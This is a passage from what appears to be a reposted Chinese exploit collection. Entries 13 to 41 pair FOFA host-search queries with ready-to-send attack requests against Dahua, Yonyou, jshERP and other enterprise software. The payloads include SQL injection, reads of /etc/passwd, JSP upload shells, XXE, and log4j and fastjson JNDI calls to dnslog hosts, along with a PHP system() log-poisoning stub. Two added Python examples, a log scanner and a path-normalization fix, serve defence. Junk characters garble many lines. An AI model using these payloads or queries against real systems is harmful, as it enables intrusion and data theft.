7 U* B. Z: X9 A% H% r9 p: j+ ZHost: 192.168.190.30
0 j" `$ |0 {" V$ J4 ]- sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
" m& z7 m: {9 }4 `Connection: close+ W& b4 k1 f; I1 B; R
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r* O- t, k% `, Q2 l1 H
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
: I$ F% ~$ V/ bX-REQUESTED-WITH: XMLHttpRequest
* X' ]; o% n9 H7 }. M3 kAccept-Encoding: gzip
9 h: x4 e  H8 _# M: U3 E7 T, o9 ^* k) l9 k8 j0 D' l% i( ?+ C+ ~

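The three steps above leave a durable artifact: the PHP stub from step 2 sits inside a log-YYYY-MM-DD.php file under application/logs, where only plain log text belongs. The script below is an added forensic example for this repost, not Jorani's or the original article's code; it walks a CodeIgniter-style logs directory and reports every line that carries a PHP open tag, listing the dangerous calls it contains. The log file names, the log line wording and the throwaway directory are constructed for the example; the expected first-line guard is CodeIgniter's usual header, and the injected stub is the one from the PoC.

```python
"""Look for PHP injected into CodeIgniter log files (the log-poisoning step of the Jorani PoC)."""
import os
import re
import tempfile

# CodeIgniter writes this guard as the first line of log-YYYY-MM-DD.php; it is expected there.
GUARD = "<?php defined('BASEPATH') OR exit('No direct script access allowed'); ?>"
PHP_TAG_RE = re.compile(r"<\?(?:php\b|=)", re.I)
DANGEROUS_CALL_RE = re.compile(r"\b(system|exec|shell_exec|passthru|eval|base64_decode)\s*\(", re.I)


def scan_log_file(path):
    """Return one finding per line that carries a PHP tag where only log text belongs."""
    findings = []
    with open(path, encoding="utf-8", errors="replace") as fh:
        for lineno, line in enumerate(fh, 1):
            if lineno == 1 and line.strip() == GUARD:
                continue  # the normal header line, not an injection
            if PHP_TAG_RE.search(line):
                calls = sorted({c.lower() for c in DANGEROUS_CALL_RE.findall(line)})
                findings.append({"file": path, "line": lineno, "calls": calls})
    return findings


def scan_log_dir(log_dir):
    """Scan every log-*.php file in a CodeIgniter application/logs directory."""
    findings = []
    for name in sorted(os.listdir(log_dir)):
        if name.startswith("log-") and name.endswith(".php"):
            findings.extend(scan_log_file(os.path.join(log_dir, name)))
    return findings


def build_sample_dir():
    """Create a throwaway logs directory: one clean file and one poisoned the way the PoC does it.
    The log text is constructed for this example; the injected stub is the one from the PoC."""
    log_dir = tempfile.mkdtemp(prefix="jorani-logs-")
    clean = GUARD + "\n\nERROR - 2023-10-23 08:00:00 --> 404 Page Not Found: Pages/view\n"
    stub = ("<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode("
            "$_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>")
    poisoned = clean + "ERROR - 2023-10-24 09:35:01 --> Login attempt for user " + stub + "\n"
    with open(os.path.join(log_dir, "log-2023-10-23.php"), "w", encoding="utf-8") as fh:
        fh.write(clean)
    with open(os.path.join(log_dir, "log-2023-10-24.php"), "w", encoding="utf-8") as fh:
        fh.write(poisoned)
    return log_dir


if __name__ == "__main__":
    for f in scan_log_dir(build_sample_dir()):
        print(f"{f['file']}:{f['line']} PHP tag in log line; calls: {', '.join(f['calls'])}")
```

Point scan_log_dir at the real application/logs directory of a suspect install. A hit is evidence of an attempt even when the stub was never triggered; pair it with the access-log search for `language=..%2F` and for requests to /pages/view/log-* to establish whether step 3 was ever executed.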
' I8 O7 ]  z( ]# G' z3 y13. 红帆iOffice ioFileDown任意文件读取! {8 I( U6 C7 F7 q0 `& l' ~4 v
FOFA:app="红帆-ioffice") d! O) x3 ~, u& W6 n
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1$ |: h1 `$ f: t- M
Host: x.x.x.x& [# B4 z' z6 x- z
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
, W/ i# e8 y8 d  W9 jConnection: close
# N& R$ E! {; n. P) VAccept: */*
$ }$ j) `( _8 {: O9 fAccept-Encoding: gzip  \  I; @! T- H) V
3 [# R0 B8 a# c0 C" o

( B1 m1 P6 H$ e' r& c* F14. 华夏ERP(jshERP)敏感信息泄露
. L1 r) b8 i2 \; o$ z" PFOFA:body="jshERP-boot"
0 u0 C3 Q8 n$ q9 l. e$ z泄露内容包括用户名密码; S( p% D, j& n4 A: `/ ~1 W3 F
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
" K( H" Q* R+ B/ E+ c3 QHost: x.x.x.x$ V# s- W1 Z& O2 _" P  q0 S0 G6 v
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
8 X1 s8 b9 C( ^) H9 V  c7 fConnection: close
& B" u7 z# @7 _/ h5 V) Q9 oAccept: */*
$ S7 h8 Z4 q! L7 s; [7 iAccept-Language: en1 E% Z# C( a" ]& ?' @6 H3 t
Accept-Encoding: gzip. j( J( D7 Y9 W# u! {$ o  I9 o

% @$ Z. y1 |" u1 E2 L# w9 c
- J% Y% {4 m) P, u. @  \8 x15. 华夏ERP getAllList信息泄露
3 M# x" u$ W, a7 OCVE-2024-0490* S, D6 O  F) U, R9 d
FOFA:body="jshERP-boot"$ z: k7 h2 r# u/ R- F
泄露内容包括用户名密码0 S2 R) ~2 l" H+ g' E2 Q9 {
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
5 E1 L8 h' W1 U! }+ _Host: 192.168.40.130:100, y) G% O3 o* G  L5 Z# [
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36' l: |" z* D2 O, S( c
Connection: close, W$ q2 w, m1 w3 T  _
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8  G% k% k" g6 l6 u
Accept-Language: en6 R$ V; b; V$ _/ s
sec-ch-ua-platform: Windows/ L1 D9 J, @. [# u6 X: ?' e, ^4 Z
Accept-Encoding: gzip% [6 E5 O# T8 O5 n/ j

7 h) G! K2 d. \3 Y9 I" d
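Entries 14 and 15 are two spellings of the same bug: the login filter and the request dispatcher disagree about which path is being requested. The page only shows the two URLs, so the filter logic below is an assumed, common shape of the flaw (a filter that exempts static suffixes by looking at the raw URI, while the MVC dispatcher strips ;matrix parameters and collapses ..) and is an added example, not jshERP's code. The hardened version decides on the same normalized path the dispatcher will route, and only on its real suffix.

```python
"""Why /user/getAllList;.ico and /user/a.ico/../getAllList reach a protected handler, and a fix.

The filter logic is an assumed, common shape of the bug, not the jshERP source."""
from urllib.parse import unquote

STATIC_SUFFIXES = (".ico", ".png", ".css", ".js")
PROTECTED = {"/jshERP-boot/user/getAllList"}   # handlers that require a login


def dispatch_path(raw_uri):
    """Resolve a request URI the way an MVC dispatcher does: strip the query string,
    percent-decode, drop ';matrix' parameters from each segment and collapse '.' and '..'."""
    path = unquote(raw_uri.split("?", 1)[0])
    segments = []
    for seg in path.split("/"):
        seg = seg.split(";", 1)[0]
        if seg == "..":
            if segments:
                segments.pop()
        elif seg and seg != ".":
            segments.append(seg)
    return "/" + "/".join(segments)


def vulnerable_allow(raw_uri, logged_in):
    """Assumed buggy filter: the static-suffix exemption is decided on the raw URI."""
    if any(suffix in raw_uri for suffix in STATIC_SUFFIXES):
        return True  # treated as a static resource, no login needed
    return logged_in or dispatch_path(raw_uri) not in PROTECTED


def hardened_allow(raw_uri, logged_in):
    """Fix: decide on the normalized path the dispatcher will use, and only on its real suffix."""
    path = dispatch_path(raw_uri)
    if path.endswith(STATIC_SUFFIXES):
        return True
    return logged_in or path not in PROTECTED


def handle(raw_uri, logged_in, allow=hardened_allow):
    """Return the handler that would run, or 'denied' when the filter blocks the request."""
    if not allow(raw_uri, logged_in):
        return "denied"
    path = dispatch_path(raw_uri)
    return "user.getAllList" if path in PROTECTED else "other"


if __name__ == "__main__":
    for uri in ("/jshERP-boot/user/getAllList;.ico", "/jshERP-boot/user/a.ico/../getAllList"):
        print(uri, "->", handle(uri, False, vulnerable_allow), "(vulnerable) /",
              handle(uri, False), "(hardened)")
```

The general rule the example demonstrates: authorization must be evaluated on exactly the path object the framework routes, never on the raw URI string, and suffix allowlists are safer expressed as a prefix (a /static/ directory) than as a file extension.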
' |" ]7 V- y7 M- w, G! a. w16.  红帆HFOffice医微云SQL注入
2 m/ h+ u+ L) k- n4 ^% z9 YFOFA:title="HFOffice"  @. }9 p; Z. l) d- t' a
poc中调用函数计算1234的md5值5 {! c2 q" u" R' @" [, g' t. Q
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
! y% B8 _, g7 G$ _2 Q' lHost: x.x.x.x* V& B; }5 @3 I8 c  U& x( ]. p
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
. g9 C& G! s  c" |Connection: close
# I% A' y8 j% W. F7 L- A, E: l0 O, sAccept: */** B  V0 v$ _9 d$ n- F8 P1 z* {
Accept-Language: en8 v+ V- [& E' S! E6 e) R
Accept-Encoding: gzip
' n' K" i1 O2 g# Q
: @+ K# A9 w6 J2 l: Y1 o) d5 U0 Z+ A( x4 Q& `/ l
17. 大华 DSS itcBulletin SQL 注入/ T# |7 r6 S: ?/ B8 W& C5 {
FOFA:app="dahua-DSS"1 Y! n+ @# w  O( S
POST /portal/services/itcBulletin?wsdl HTTP/1.1
& d3 u- n4 x8 |Host: x.x.x.x
/ e! f& P0 P8 E: ^; R, j- D; K. {( ZUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
0 K& V" L; M! k1 V* ZConnection: close0 F" s4 `6 ?( I% _0 I  p2 r
Content-Length: 3451 [) p" d% I' A2 y  U
Accept-Encoding: gzip
8 X7 {- S" [+ D
% c" ]7 F, d& H& p. `<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
  ~. v: C+ H! s# q% r% X: G  r  Q<s11:Body>
, ~) n+ w$ ?1 A+ k' c    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
/ n2 j9 h' C; C- C# Y: K9 H      <netMarkings>
6 B# X) x$ K7 C1 ~' c       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
$ Q( H# m2 M# t6 T      </netMarkings>
8 G- O# Z* \" W1 u1 ^/ ~    </ns1:deleteBulletin>. E1 p& p0 R- B
  </s11:Body>/ j: K& k5 X+ N. l5 S
</s11:Envelope># V# A- @, W8 j
# ]) V: A3 t' `" b- G, |
# T& D0 d; }1 ^. V* ~
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
7 {5 F& p# V, L4 m( yFOFA:app="dahua-DSS"8 E" Q. h5 X8 X
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1/ }6 ~/ f5 A. j. C! M# Y
Host: your-ip
" D. z, T- D) G; h( u; eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
0 S) Q: W! z$ Q0 v% U* eAccept-Encoding: gzip, deflate
( d. R7 _* H2 e. R8 bAccept: */*$ f: y- x$ E, E: d3 @% G& I
Connection: keep-alive% i. [9 R5 h% N' q" Z

8 E, p. L8 y; R7 ]1 o0 j3 A/ i- k5 _% m+ ~: s6 h

4 e. `! }) O; R  x' f6 X/ ~7 P19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
1 y& n& [+ a2 h+ A4 N; vFOFA:app="dahua-DSS"
6 s% }! E4 c! z* ]& @( ?) FGET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.13 F2 W% w# C$ H! U  @3 C5 R
Host:! g9 b" f  |3 |8 @
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36& ^: q' Y/ D" K( @
Accept-Encoding: gzip, deflate, `; k! {7 m' W
Accept: */*- Q( k: s( m" j- K
Connection: keep-alive* P: ]2 U3 ]- d- P; B
" O* q* S) o, L7 ~! Z

6 G0 Z; |( O* t7 S; w- `& W+ x. T20. 大华ICC智能物联综合管理平台任意文件读取
5 z1 H& e8 o/ Y: m' M$ mFOFA:body="*客户端会小于800*"
& \$ {' L5 h( Y3 cGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
; y2 H  S: R# w# {Host: x.x.x.x; U( @, U2 y  H% i
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36* M& o' y2 i5 m8 @) u0 n, B
Connection: close
9 K" t! C0 F3 `Accept: */*/ _: S1 l6 W; N- S8 a
Accept-Language: en
0 J& ~1 y- V& w8 f; t' bAccept-Encoding: gzip; z/ S5 p$ |- T, R+ B9 u
* X8 F# m3 s- r- E: h0 _( [+ p
% {* j" o9 ]$ A  T" n2 B
21. 大华ICC智能物联综合管理平台random远程代码执行. ^# W! |4 A; m# k2 Q/ }: T
FOFA:icon_hash="-1935899595"
0 v: q/ F; B0 I2 r9 [. \' U- {2 ?7 K) bPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
0 _9 K2 F* d" E& c$ |5 j" Z2 RHost: x.x.x.x6 W. u1 b/ A' A" p8 w$ W
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.159 `' ]  }, w/ \7 x* m2 Y# t
Content-Length: 161
- A5 I- i$ i: Z$ r; ?3 {6 e, s( U  {Accept-Encoding: gzip
# f* }) T2 Z8 R) p- o- rConnection: close. g5 k8 h* L- S2 c' \6 g
Content-Type: application/json;charset=utf-8
/ V, [, f# l9 e! E
: J" n" j( R2 w{
( I- }' {$ ?  i8 a. X"a":{( @3 Z7 }& G& U! f
   "@type":"com.alibaba.fastjson.JSONObject",% W& P4 Y' l' p0 S& D, R
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}; o8 c+ q# V+ \1 f6 P- p4 j
  }""
% j+ r7 v8 s3 C) ]; W. Y+ H}
8 L. I9 W; Z3 l2 a8 ~& [  W* b6 ^3 B7 |$ E0 B# c7 V

2 A, A. R: F  W# d22. 大华ICC智能物联综合管理平台 log4j远程代码执行
7 }5 Z& x# q0 Q8 _6 [FOFA:icon_hash="-1935899595"; o+ h0 k  x$ L8 E' h: B
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
! Z6 R" w  l7 U8 q0 K3 d: _Host: your-ip
( p( c8 e) n2 PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
; d$ `' ~2 W( m5 r9 r) QContent-Type: application/json;charset=utf-8
7 x# L; s) o" {4 D2 x9 q! m4 s4 ~4 x/ A0 [3 ]
{
  C, ]$ l6 I; W4 n% T6 E" {0 K"loginName":"${jndi:ldap://dnslog}"/ I  }5 o* N" d; H
}
, W- _  T4 H; H+ N
# c- g, @0 f! k, q* O# h
; Z# }* J8 }4 e0 j. F3 h# _( y+ ?  L8 p& W1 n! d
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行3 p8 s/ C* ^. p
FOFA:icon_hash="-1935899595"7 ^5 t: E* x( z
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
% I. k1 T8 t+ o# s+ n7 j- P. b: sHost: your-ip
2 ~: u5 O/ R& L+ Y0 zUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
4 ^+ y2 c0 ?5 T7 _& z6 XContent-Type: application/json;charset=utf-8
* {# f  w( K- `4 k7 o7 e! N4 LAccept-Encoding: gzip% v) A1 e4 {8 L; e8 A, y; S
Connection: close
/ w# H# G3 R. r" f8 s' K1 D- q
; M" G7 {" a, T! w) Y/ e9 _7 |{( K% Y1 R! w+ O, r
    "a":{
; f; C) t* |8 B4 g+ x        "@type":"com.alibaba.fastjson.JSONObject",
) w' s% F9 [& V" m, s, \       {"@type":"java.net.URL","val":"http://DNSLOG"}
4 y' J0 j. ?* u2 Y; {# n0 B        }""
' D# r0 f# t- Y' \+ n}& |. m- U4 }  i9 T
8 Z! [, z% f, v( e9 s* K
0 w( C( U$ j& g5 ?# @% A4 s- ]# E
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA:icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg
------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
version= NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
version:NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo interface SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
